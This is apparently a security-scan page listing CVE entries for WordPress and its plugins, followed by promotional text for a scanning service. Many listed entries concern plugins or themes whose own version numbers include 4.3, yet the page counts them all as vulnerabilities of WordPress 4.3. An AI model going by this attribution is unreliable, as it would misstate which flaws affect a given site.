| CVE-2023-7288 | MEDIUM | 5.4 | 2024-10-16 | The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the update_profile_preferen… |
| CVE-2023-7289 | MEDIUM | 5.4 | 2024-10-16 | The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized API key update due to a missing capability check on the paytium_sw_save_api_keys f… |
| CVE-2025-4571 | MEDIUM | 5.4 | 2025-06-19 | The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to unauthorized view and modification of data due to an insufficient capability check on t… |
| CVE-2025-14802 | MEDIUM | 5.4 | 2026-01-07 | The LearnPress – WordPress LMS Plugin for WordPress is vulnerable to unauthorized file deletion in versions up to, and including, 4.3.2.2 via the /wp-json/lp/v1/material/{file_id}… |
| CVE-2026-2879 | MEDIUM | 5.4 | 2026-03-13 | The GetGenie plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.3.2. This is due to missing validation on the `id` para… |
| CVE-2024-3897 | MEDIUM | 5.3 | 2024-05-02 | The Popup Box – Best WordPress Popup Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ays_pb_create_author AJAX ac… |
| CVE-2023-4730 | MEDIUM | 5.3 | 2024-08-17 | The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the init_endpoint() function hooked via 'init' in versions … |
| CVE-2024-2541 | MEDIUM | 5.3 | 2024-08-29 | The Popup Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.6 via the Subscribers Import feature. This makes i… |
| CVE-2025-13956 | MEDIUM | 5.3 | 2025-12-16 | The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the statistic function in all versions… |
| CVE-2025-13964 | MEDIUM | 5.3 | 2026-01-06 | The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the catch_lp_ajax function in al… |
| CVE-2025-14948 | MEDIUM | 5.3 | 2026-01-10 | The miniOrange OTP Verification and SMS Notification for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on t… |
| CVE-2025-14798 | MEDIUM | 5.3 | 2026-01-20 | The LearnPress – WordPress LMS Plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.3.2.4 via the get_item_permissions_check fu… |
| CVE-2026-1938 | MEDIUM | 5.3 | 2026-02-18 | The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized license key deletion due to a missing authorization check on the `/yaymail-license/v1… |
| CVE-2026-3504 | MEDIUM | 5.3 | 2026-05-02 | The Dokan: AI Powered WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.1… |
| CVE-2026-8502 | MEDIUM | 5.3 | 2026-06-06 | The LearnPress – WordPress LMS Plugin for Create and Sell Online Courses plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including,… |
| CVE-2024-32111 | MEDIUM | 5.0 | 2024-06-25 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Automattic WordPress allows Relative Path Traversal.This issue affects WordPress: f… |
| CVE-2020-36831 | MEDIUM | 5.0 | 2024-10-16 | The NextScripts: Social Networks Auto-Poster plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on multiple user privilege/security functi… |
| CVE-2025-9085 | MEDIUM | 4.9 | 2025-09-06 | The User Registration & Membership plugin for WordPress is vulnerable to SQL Injection via the 's' parameter in version 4.3.0. This is due to insufficient escaping on the user sup… |
| CVE-2021-24612 | MEDIUM | 4.8 | 2021-10-18 | The Sociable WordPress plugin through 4.3.4.1 does not sanitise or escape some of its settings before outputting them in the admins dashboard, allowing high privilege users to per… |
| CVE-2021-36843 | MEDIUM | 4.8 | 2021-11-26 | Authenticated Stored Cross-Site Scripting (XSS) vulnerability discovered in WordPress Floating Social Media Icon plugin (versions <= 4.3.5) Social Media Configuration form. Requir… |
| CVE-2022-2089 | MEDIUM | 4.8 | 2022-07-11 | The Bold Page Builder WordPress plugin before 4.3.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site S… |
| CVE-2022-45816 | MEDIUM | 4.8 | 2022-12-06 | Auth. Stored Cross-Site Scripting (XSS) vulnerability in GD bbPress Attachments plugin <= 4.3.1 on WordPress. |
| CVE-2022-4042 | MEDIUM | 4.8 | 2022-12-26 | The Paytium: Mollie payment forms & donations WordPress plugin before 4.3.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin… |
| CVE-2024-9428 | MEDIUM | 4.8 | 2024-12-12 | The Popup Builder WordPress plugin before 4.3.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Si… |
| CVE-2024-5026 | MEDIUM | 4.8 | 2025-05-15 | The CM Tooltip Glossary WordPress plugin before 4.3.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cro… |
| CVE-2024-5032 | MEDIUM | 4.7 | 2024-07-13 | The SULly WordPress plugin before 4.3.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be … |
| CVE-2026-1943 | MEDIUM | 4.4 | 2026-02-18 | The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via settings in all versions up to, and including, 4.3.2 due to insuff… |
| CVE-2026-6813 | MEDIUM | 4.4 | 2026-05-12 | The Continually plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.3.1 due to insufficient input sanitiza… |
| CVE-2013-1636 | MEDIUM | 4.3 | 2014-03-12 | Cross-site scripting (XSS) vulnerability in open-flash-chart.swf in Open Flash Chart (aka Open-Flash Chart), as used in the Pretty Link Lite plugin before 1.6.3 for WordPress, JNe… |
| CVE-2015-5715 | MEDIUM | 4.3 | 2016-05-22 | The mw_editPost function in wp-includes/class-wp-xmlrpc-server.php in the XMLRPC subsystem in WordPress before 4.3.1 allows remote authenticated users to bypass intended access re… |
| CVE-2022-0313 | MEDIUM | 4.3 | 2022-02-21 | The Float menu WordPress plugin before 4.3.1 does not have CSRF check in place when deleting menu, which could allow attackers to make a logged in admin delete them via a CSRF att… |
| CVE-2022-0444 | MEDIUM | 4.3 | 2022-06-27 | The Backup, Restore and Migrate WordPress Sites With the XCloner Plugin WordPress plugin before 4.3.6 does not have authorisation and CSRF checks when resetting its settings, allo… |
| CVE-2022-4148 | MEDIUM | 4.3 | 2023-03-20 | The WP OAuth Server (OAuth Authentication) WordPress plugin before 4.3.0 has a flawed CSRF and authorisation check when deleting a client, which could allow any authenticated user… |
| CVE-2023-39999 | MEDIUM | 4.3 | 2023-10-13 | Exposure of Sensitive Information to an Unauthorized Actor in WordPress from 6.3 through 6.3.1, from 6.2 through 6.2.2, from 6.1 through 6.13, from 6.0 through 6.0.5, from 5.9 thr… |
| CVE-2020-36755 | MEDIUM | 4.3 | 2023-10-20 | The Customizr theme for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.3.0. This is due to missing or incorrect nonce validation on the … |
| CVE-2023-7068 | MEDIUM | 4.3 | 2024-01-03 | The WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check… |
| CVE-2023-4626 | MEDIUM | 4.3 | 2024-03-12 | The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ladiflow_save_hook() function in versions up to, and i… |
| CVE-2023-4629 | MEDIUM | 4.3 | 2024-03-12 | The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the save_config() function in versions up to, and including, 4.3. This… |
| CVE-2023-7290 | MEDIUM | 4.3 | 2024-10-16 | The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the check_for_verified_profile… |
| CVE-2023-7292 | MEDIUM | 4.3 | 2024-10-16 | The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized notification dismissal due to a missing capability check on the paytium_notice_dis… |
| CVE-2023-7293 | MEDIUM | 4.3 | 2024-10-16 | The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the check_mollie_account_detai… |
| CVE-2024-12532 | MEDIUM | 4.3 | 2025-01-07 | The BWD Elementor Addons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.18 in widgets/bwdeb-content-switcher.php. T… |
| CVE-2026-1003 | MEDIUM | 4.3 | 2026-01-16 | The GetGenie plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.3.0. This is due to the plugin not properly verifying that a user i… |
| CVE-2026-24596 | MEDIUM | 4.3 | 2026-01-23 | Cross-Site Request Forgery (CSRF) vulnerability in marynixie Related Posts Thumbnails Plugin for WordPress related-posts-thumbnails allows Cross Site Request Forgery.This issue af… |
| CVE-2026-3226 | MEDIUM | 4.3 | 2026-03-12 | The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized email notification triggering due to missing capability checks on all 10 functions in the … |
| CVE-2026-3225 | MEDIUM | 4.3 | 2026-03-23 | The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized deletion of quiz question answers due to a missing capability check in the delete_question… |
| CVE-2026-6393 | MEDIUM | 4.3 | 2026-04-24 | The BetterDocs plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 4.3.11. This is due to a missing capability check in the generate_openai… |
| CVE-2026-7648 | MEDIUM | 4.3 | 2026-05-14 | The LearnPress – WordPress LMS Plugin for Create and Sell Online Courses plugin for WordPress is vulnerable to payment bypass through user-controlled key in all versions up to, an… |
| CVE-2020-4050 | LOW | 3.5 | 2020-06-12 | In affected versions of WordPress, misuse of the `set-screen-option` filter's return value allows arbitrary user meta fields to be saved. It does require an admin to install a plu… |
| CVE-2026-1831 | LOW | 2.7 | 2026-02-18 | The YayMail - WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized plugin installation and activation due to missing capability checks on the 'yaymail_i… |
| CVE-2020-4049 | LOW | 2.4 | 2020-06-12 | In affected versions of WordPress, when uploading themes, the name of the theme folder can be crafted in a way that could lead to JavaScript execution in /wp-admin on the themes p… |
WordPress 4.3 presents a serious security risk: the scan associates 144 known vulnerabilities with it, and the critical entries among them lead to code execution, data theft, and full site compromise. Delaying the upgrade is a business risk as much as a technical one, carrying lost customers, legal liability, and recovery costs.
Don't let your website become another victim of preventable attacks. SiteRecipe.com provides comprehensive WordPress security scanning and automated vulnerability assessment tools that identify which versions you're running and flag all known CVEs affecting your site. Our platform makes it easy to track your WordPress health, prioritize critical updates, and maintain a secure online presence. Start your free security scan today and protect your website before it's too late.